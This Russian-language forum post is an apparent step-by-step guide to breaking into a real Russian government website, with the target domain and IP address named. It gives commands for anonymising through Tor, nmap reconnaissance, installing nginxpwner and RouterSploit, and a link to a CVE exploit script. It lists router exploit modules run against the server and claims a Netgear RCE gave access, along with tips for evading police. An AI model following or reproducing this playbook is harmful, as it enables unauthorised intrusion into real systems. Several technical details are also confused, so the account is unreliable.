1234

1234


Попытка взлома Полномоченого представителя президента (инструкция)

Мой первый шаг сканирование nmap

Мои цели

1. узнать ос сервера

2. узнать версию сервера

3. подобрать эксплоит

4. Получить доступ к серверу

МЫ ДОЛЖНЫ ОСТАТЬСЯ АНОНИМНЫМИ

ВАЖНО

Используем тор

Код:



sudo apt-get install tor

sudo systemctl start tor

По желанию ставим тор в автозапуск

sudo systemctl enable tor

git clone https://github.com/ruped24/toriptables2

cd toriptables2/

sudo mv toriptables2.py  /usr/local/bin/

cd toriptables2.py -h

или просто

Код:



apt install tor

tor

Первое

Разведка

узнаем есть ли блокировка доступа по айпи

nmap http://cfo.gov.ru

1647732477960.png



как видим они блокируют доступ по айпи , значит возможно есть админка и они пытаются улизнуть от брутфорса гидрой , но они похоже не знают что современная гидра работает и через url.

(как я заметил все сайты хостятся на одном домене gov.ru)

скрин нмап

1647732691043.png



Всем советую перезагружать дедик после каждой нмап команды. ЭТО Я ИЗ БУДУЩЕГО ПРОСТО ПРОПИСЫВАЕМ В КОНЦЕ КАЖДОЙ КОМАНДЕ -PM

1647734677151.png



Наш скан операционной системы дал очень странные резульаты ,возможно имеем дело с своей ос но будем искать эксплоиты для всех ос из предложенных если ngnixpwner не сработает

1647733065086.png



будем использовать репозиторий уже в открытом доступе гитхаб репозиторий

github.com



GitHub - stark0de/nginxpwner: Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.

Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities. - GitHub - stark0de/nginxpwner: Nginxpwner is a simple tool to look for common Nginx misconfigurations an...

github.com

ИНСТАЛ БЕЗ ДОКЕРА

Код:



cd /opt
git clone https://github.com/stark0de/nginxpwner
cd nginxpwner
chmod +x install.sh
./install.sh

ИНСТАЛ С ДОКЕРОМ

Код:



git clone https://github.com/stark0de/nginxpwner
cd nginxpwner
sudo docker build -t nginxpwner:latest .

sudo docker run -it nginxpwner:latest /bin/bash

Теперь надо найти все URLS ON THE HOST

И на конец python3 nginxpwner.py https://example.com /tmp/pathlist

1647735124397.png



как видим они чисят логи и на конфиге стоит видимо chmod 1

поэтому дак дак гоу в помощь ищем эксплоиты для нгникс на гитхабе

НЕ ПОДХОДЯТ

не плохой сайт который будем юзать https://exploitalert.com/search-results.html?search=Nginx

или https://gist.githubusercontent.com/thehappydinoa/bc3278aea845b4f578362e9363c51115/raw/187991054b72ab01f6f34f77a09548cd07f72155/CVE_2017_7529.py (важно это питоновский скрипт)

НГНИКС версию установить не получилось поэтому либо подберем эксплоит под ос или мы будем пытатся найти скрытое содержание на сайте , а дальше ломать через burp suit или гидры но работать по url

Подбор эксплоита по ос

Скорее всего хост этого сайта Adtran Total Access 904 router или Linux 2.6.26

Как я заметил это большой тренд среди правительственных сайтов хостится на роутерах .

Устанавливаем router sploit (не тот что в кали)

Код:


apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

возможные эксплоиты

Код:



[*] 95.173.135.150:80 http exploits/routers/dlink/dsl_2640b_dns_change Could not be verified
[*] 95.173.135.150:1900 custom/udp exploits/routers/dlink/dir_815_850l_rce Could not be verified
[*] 95.173.135.150:80 http exploits/routers/dlink/dsl_2740r_dns_change Could not be verified
[*] 95.173.135.150:80 http exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change Could not be verified
[*] 95.173.135.150:80 http exploits/routers/shuttle/915wm_dns_change Could not be verified
[*] 95.173.135.150:80 http exploits/routers/netgear/dgn2200_dnslookup_cgi_rce Could not be verified
[*] 95.173.135.150:80 http exploits/routers/cisco/secure_acs_bypass Could not be verified
[*] 95.173.135.150:23 custom/tcp exploits/routers/cisco/catalyst_2960_rocem Could not be verified
[*] 95.173.135.150:80 http exploits/routers/billion/billion_5200w_rce Could not be verified
[*] 95.173.135.150:80 http exploits/routers/3com/officeconnect_rce Could not be verified
[*] 95.173.135.150:80 http exploits/routers/asus/asuswrt_lan_rce Could not be verified

а теперь идет ручной перебор данных эксплойтов

НЕ ПОДХОДЯТ

exploits/routers/dlink/dsl_2640b_dns_change

exploits/routers/asus/asuswrt_lan_rce

exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change

Проверка прошла но не дала ожидаемый результат

custom/udp exploits/routers/dlink/dir_815_850l_rce

exploits/routers/cisco/secure_acs_bypass(этот сработал но если мы будем его использовать то мы лишимся анонимности ибо не получится создать зашищенное соединение)НЕТ ДАЖЕ НЕ ПЫТАЙСЯ ИЛИ ЧЕРЕЗ 30 МИНУТ У ТЕБЯ НА ДОМУ БУДУТ МЕНТЫ , ДФЖЕ ЕСЛИ ТЫ ТАКОЙ КРУТОЙ ХАКЕР И У ТЕБЯ ДЕДИК ТАК ЧТО СЧИТАЕМ ЧТО ЭКСПЛОИТ НЕ РАБОТАЕТ

УРА МЫ ВНУТРИ

exploits/routers/netgear/dgn2200_dnslookup_cgi_rce данный эксплоит работает и мы внутри

1647738366805.png



Report Page